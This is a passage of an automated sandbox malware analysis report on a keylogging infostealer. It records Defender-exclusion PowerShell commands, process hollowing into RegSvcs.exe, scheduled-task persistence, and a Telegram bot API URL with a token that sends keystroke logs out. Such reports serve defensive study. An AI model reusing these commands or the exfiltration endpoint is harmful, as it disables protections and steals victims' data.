                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598483
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598246
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598140
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 598016
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597906
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597797
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597687
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597578
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597468
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597359
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597250
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597140
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 597031
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596922
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596812
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596703
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596562
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596453
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596344
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596234
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596124
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 596013
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595906
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595688
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595575
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595427
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595275
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 595109
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594984
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594874
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594763
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594655
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594547
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594437
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594328
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594219
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594109
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 594000
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 593890
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Thread delayed: delay time: 593781
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599891
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599562
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599453
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599343
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599234
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599125
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 599015
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598907
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598782
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598657
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598532
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598407
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598282
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 598094
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597985
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597813
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597687
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597552
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597355
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597211
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 597110
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596985
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596860
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596735
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596610
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596485
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596360
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 596110
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595985
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595860
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595735
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595610
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595485
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595360
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595235
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 595110
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594985
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594860
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594735
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594610
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594485
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594360
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594235
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 594110
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 593985
                    Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Thread delayed: delay time: 593860
                    Source: WebData.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                    Source: WebData.12.dr | Binary or memory string: discord.comVMware20,11696428655f
                    Source: WebData.12.dr | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: global block list test formVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B93000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBn
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                    Source: WebData.12.dr | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                    Source: WebData.12.dr | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                    Source: WebData.12.dr | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                    Source: WebData.12.dr | Binary or memory string: outlook.office365.comVMware20,11696428655t
                    Source: WebData.12.dr | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                    Source: ECmmsbHOaKPh.exe, 0000000D.00000002.1711596699.0000000006F10000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: WebData.12.dr | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: outlook.office.comVMware20,11696428655s
                    Source: WebData.12.dr | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                    Source: WebData.12.dr | Binary or memory string: ms.portal.azure.comVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: AMC password management pageVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: tasks.office.comVMware20,11696428655o
                    Source: g44YQtTyjN.exe, 00000000.00000002.1514045529.000000000734B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                    Source: WebData.12.dr | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                    Source: WebData.12.dr | Binary or memory string: interactivebrokers.comVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: dev.azure.comVMware20,11696428655j
                    Source: WebData.12.dr | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                    Source: WebData.12.dr | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                    Source: WebData.12.dr | Binary or memory string: bankofamerica.comVMware20,11696428655x
                    Source: g44YQtTyjN.exe, 00000000.00000002.1514045529.0000000007366000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll?
                    Source: WebData.12.dr | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                    Source: WebData.12.dr | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\g44YQtTyjN.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\g44YQtTyjN.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 458000
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 689008
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 458000
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 459000
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 745008
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp82D7.tmp"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\g44YQtTyjN.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ECmmsbHOaKPh" /XML "C:\Users\user\AppData\Local\Temp\tmp8B71.tmp"
Source: C:\Users\user\AppData\Roaming\ECmmsbHOaKPh.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: KeyDataAwVeEbbs.txt.12.dr | Binary or memory string: [17:14:41]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 17:13:59]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 03]<<Program Manager
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :14:56]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:54]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:28]<<Program Manager>>5
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC\donsocument
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:18]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:42]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:19]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:20]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:55]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--7]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 07]<<Program Manager>>[1
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: https://api.telegram.org/bot7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGaw/sendDocument?chat_id=2001212894&caption=DC-KL:::user-PC\user\52]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:47]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 22]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:56]<<Program Manager_id":"AgADgh0AAoe-YFI","file_size":396},"caption":"DC-KeyDatabcwuTujf.txt:::user-PC\\user\\"}}
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.dr | Binary or memory string: [17:13:32]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.dr | Binary or memory string: [17:13:29]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGawvwxyz-fca7ff59c1138BjuGaw51]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:51]<<Program Manager><
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:51]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:08]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:02Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:55]<<Program Manager>
Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"ok":true,"result":{"message_id":193,"from":{"id":7879240328,"is_bot":true,"first_name":"ugobest147","username":"ugobest147bot"},"chat":{"id":2001212894,"first_name":"Joe","last_name":"Joe","type":"private"},"date":1741385655,"document":{"file_name":"KeyDataHqyQZWUg.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAPBZ8tvt28JvsljNQogKF_0Gka8n08AAmgdAAKHvmBSPo8RcXLXI1M2BA","file_unique_id":"AgADaB0AAoe-YFI","file_size":2145},"caption":"DC-KL:::user-PC\\user\\"}}11]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 3]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlJLqwI.txt.12.dr | Binary or memory string: [17:14:38]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561065665.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:55]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:34]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:17]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:56]<<Program Manager_id":"AgADfR0AAoe-YFI","file_size":396},"caption":"DC-KL:::user-PC\\user\\"}}rogram Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: S-PC\user\4:52]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:11]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:43]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:58]<<Program Manager>>a
Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:38]<<Program Manager>>z
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDatarFwERdwA.txt.12.dr | Binary or memory string: [17:14:45]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--0]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:55<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:01]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:44]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataFCXylbPs.txt.12.dr | Binary or memory string: [17:14:28]<<Program Manager>>
